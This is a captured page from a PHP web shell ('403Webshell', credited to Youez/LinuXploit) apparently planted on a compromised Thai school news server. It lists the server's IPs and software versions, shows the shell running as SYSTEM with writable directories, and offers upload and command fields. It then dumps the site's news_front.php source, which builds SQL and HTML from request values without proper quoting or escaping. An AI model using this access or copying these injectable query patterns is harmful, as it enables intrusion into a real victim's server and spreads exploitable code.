403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Inetpub/www/news/group/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /Inetpub/www/news/group/news_front.php
<?php 
session_start();
include("db.php"); 
if(!isset($_SESSION['username'])){
}else{ 
$username1 = $_SESSION['username'];
$user1 = $mysqli->query("SELECT * FROM users WHERE username='$username1' LIMIT 1");
$userrow1 = mysqli_fetch_array($user1);
} 

$sitesettings = $mysqli->query("SELECT * FROM settings WHERE id='1'");
$settingsrow = mysqli_fetch_array($sitesettings);

?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="https://program.sesaorb.go.th/news/csr/admin/assets/css/style.css" rel="stylesheet" type="text/css" />
	<meta name="author" content="">

    <!-- Bootstrap core CSS -->
    <link href="https://program.sesaorb.go.th/news/csr/main/assets/css/bootstrap.min.css" rel="stylesheet">

	<!-- Font Awesome CSS -->
	<link href="https://program.sesaorb.go.th/news/csr/main/assets/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css" />

    <!-- Custom styles for this template -->
    <link href="https://program.sesaorb.go.th/news/csr/main/assets/css/custom.css" rel="stylesheet">
	
	<!-- Core Scripts -->
	<script src="https://program.sesaorb.go.th/news/csr/main/assets/js/jquery.min.js"></script>
	<script src="https://program.sesaorb.go.th/news/csr/main/assets/js/bootstrap.bundle.min.js"></script>
	
<link href="https://fonts.googleapis.com/css?family=Prompt" rel="stylesheet">
<style>
   body {
	 margin-top: -50px;
	 margin-left: 30px;
	
   font-family: 'Prompt', sans-serif;  
   }
   h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
   font-family: 'Prompt', sans-serif;
   }
bx {
    color: #ffffff;
    text-shadow: -2px 0 #330033, 0 2px #330033, 3px 0 #330033, 0 -2px #330033;
} 
.cardx1 {
        position: absolute;
        margin-top: 52% !important;
        margin-left: -3% !important;
        margin-right: 0% !important;
        padding: 0;
    }
.cardx2 {
        position: absolute;
        margin-top: 3% !important;
        margin-left: 7% !important;
        margin-right: 0% !important;
        padding: 0;
		color: #ffffff;
		
    }
.ex1{
	background-color: #669900;
	width : 100px;
}
.cardx3 {
        position: absolute;
        margin-top: 48% !important;
        margin-left: -5% !important;
        margin-right: 0% !important;
        padding: 0;
    }	
</style>
</head>
<body>
<div class="row">

	  <?php
	$school=$mysqli->escape_string($_GET['school']);
	$limit =$mysqli->escape_string($_GET['limit']);
	$col =$mysqli->escape_string($_GET['col']);
	$thum_width=$mysqli->escape_string($_GET['thum_width']);
	$thum_hight=$mysqli->escape_string($_GET['thum_hight']);

	$strSQL= $mysqli->query("SELECT * FROM posts where cat_id='$school' ORDER BY id DESC LIMIT $limit");
	$intRows = 0;
	while($objResult=mysqli_fetch_array($strSQL)) {	
	$intRows++;
	?>
<div class="card " style="width:<?php echo $thum_width;?>px">

  <?php if ($objResult['id'] > 4430){ ?>
    <img class="card-img-top" src="https://program.sesaorb.go.th/news/group/uploads/<?php echo $objResult["image"];?>" alt="<?php echo $objResult["title"];?>" style="width:<?php echo $thum_width;?>" height="<?php echo $thum_hight;?>">
  <?php } else { ?>
	<img src="uploads/<?php echo $objResult["image"];?>" height="200" alt="<?php echo $objResult["title"];?>">
  <?php } ?>

<div class="card-body">
<a href="https://program.sesaorb.go.th/news/group/story.php?id=<?php echo $objResult["id"];?>" target="_blank">
	<div class="card-img-overlay cardx2">
	
	<font size="1">
	<div class="row">
	<?php
$today=date("d-m-Y");
$date_news=$objResult['date'];
$rest2 = substr("$date_news", 0,-9);
$news_day=(strtotime($today)-strtotime($rest2))/(60*60*24);
if($news_day <= 2) { echo "&nbsp <img src='images/update_news.gif'>";} else { echo "";}	
	?>&nbsp <p class="ex1">
	<?=$objResult['date'];?></font>
	</div>
	<div class="card-img-overlay cardx1">
<?php 
$sc=$objResult['cat_id'];
$sql2= $mysqli->query("select * from users where id = $sc");
$record = mysqli_fetch_array($sql2);
$schoolname=$record['school'];
$sc_school = iconv_substr("$schoolname", 0,26,"UTF-8")."";
echo "<div><bx><font size='3'><span class='badge badge-dark'>$sc_school</span></font></bx></div>";
?>
	</div>	
	<div class="card-img-overlay cardx3">
	<div class="spinner-grow text-warning"></div>
	</div>		
	</div>
	</a>
<?php $ti_news = iconv_substr("$objResult[title]", 0,60,"UTF-8")."..";  echo "<font size='2'><span class='{vertical-align:top;}'>$ti_news</span></font>"; ?> 
</div> 	
</div>
	<?php } ?>
<?php
echo "
<table width='98%' border='0'>
  <tr>
    <td align='right'></td>
  </tr>
</table>
";	
	?>
  </div>
 
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit